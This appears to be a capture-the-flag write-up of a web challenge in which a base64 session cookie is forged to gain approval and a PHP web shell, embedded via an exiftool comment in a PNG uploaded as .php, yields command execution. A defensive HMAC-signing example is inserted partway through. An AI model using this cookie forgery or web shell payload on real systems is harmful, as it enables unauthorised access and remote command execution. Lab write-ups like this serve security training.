
Day 4: Elf Directory

Challenge description
Can you infiltrate the Elf Directory to get a foothold inside Santa's data warehouse in the North Pole?

Enumeration

No source code this time. Let's poke at the application!

We are presented with a way to register and log in. Once logged in, we are told that only authorised personnel can edit their profile... So sad.

Dashboard

Contact the admin elf? Ain't my username admin already? The application must be checking that status somewhere.

Cookies

To maintain state, the application uses a PHP session cookie. The value looks decodable (base64), so let's decode it in CyberChef.

Decode

Hmm... What if I change the value of approved to true and replace the cookie with eyJ1c2VybmFtZSI6ImFkbWluIiwiYXBwcm92ZWQiOnRydWV9?
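Why the forged cookie above works, and what a server-side signature would do instead, as an added example that is not part of the original writeup: the cookie value is the one decoded above, while the secret key and the function names are constructed placeholders.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Cookie value from the writeup: base64 of JSON with a client-controlled "approved" flag.
FORGED_COOKIE = "eyJ1c2VybmFtZSI6ImFkbWluIiwiYXBwcm92ZWQiOnRydWV9"

# Constructed placeholder secret; a real app would load this from its configuration.
SECRET_KEY = b"placeholder-secret-key"


def decode_unsigned(cookie: str) -> dict:
    """What the vulnerable app effectively does: trust whatever JSON the client sends."""
    return json.loads(base64.b64decode(cookie))


def _tag(payload: str) -> str:
    """HMAC-SHA256 over the encoded payload, keyed with the server secret."""
    return hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_cookie(username: str, approved: bool) -> str:
    """Hardened variant: the server appends a signature to the encoded claims."""
    claims = {"username": username, "approved": approved}
    payload = base64.b64encode(json.dumps(claims).encode()).decode()
    return payload + "." + _tag(payload)


def verify_cookie(cookie: str) -> Optional[dict]:
    """Return the claims only if the signature checks out; otherwise None."""
    if "." not in cookie:
        return None  # the unsigned cookie from the challenge carries no tag at all
    payload, tag = cookie.rsplit(".", 1)
    # compare_digest avoids timing leaks when comparing the tags
    if not hmac.compare_digest(_tag(payload), tag):
        return None
    return json.loads(base64.b64decode(payload))


def tampered_copy(cookie: str) -> str:
    """Flip "approved" inside a signed cookie but keep the old tag (what CyberChef edits would do)."""
    payload, tag = cookie.rsplit(".", 1)
    claims = json.loads(base64.b64decode(payload))
    claims["approved"] = True
    new_payload = base64.b64encode(json.dumps(claims).encode()).decode()
    return new_payload + "." + tag
```

Only the server holds SECRET_KEY, so the "approved" flag can no longer be upgraded client-side; the same outcome is reached by keeping the flag server-side and sending only an opaque session ID.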

Upload

New upload functionality! Poking around, it strictly only allows PNG files. No plain filename tricks here...

However, it does accept a filename of <name>.php for a genuine PNG... Let's embed the PHP script in an actual image, as a comment in the image metadata.

exiftool -Comment="<?php if(isset(\$_REQUEST['cmd'])){ echo \"<pre>\"; \$cmd = (\$_REQUEST['cmd']); system(\$cmd); echo \"</pre>\"; die; }?>" test.png

Next, before sending the image, we change the filename to end in .php in either Burp Suite or Firefox DevTools.

Now we can browse to the uploaded file and pass commands through the cmd parameter!

Injection

Voilà. Now we just have to find the flag.

Flag

HTB{br4k3_au7hs_g3t_5h3lls}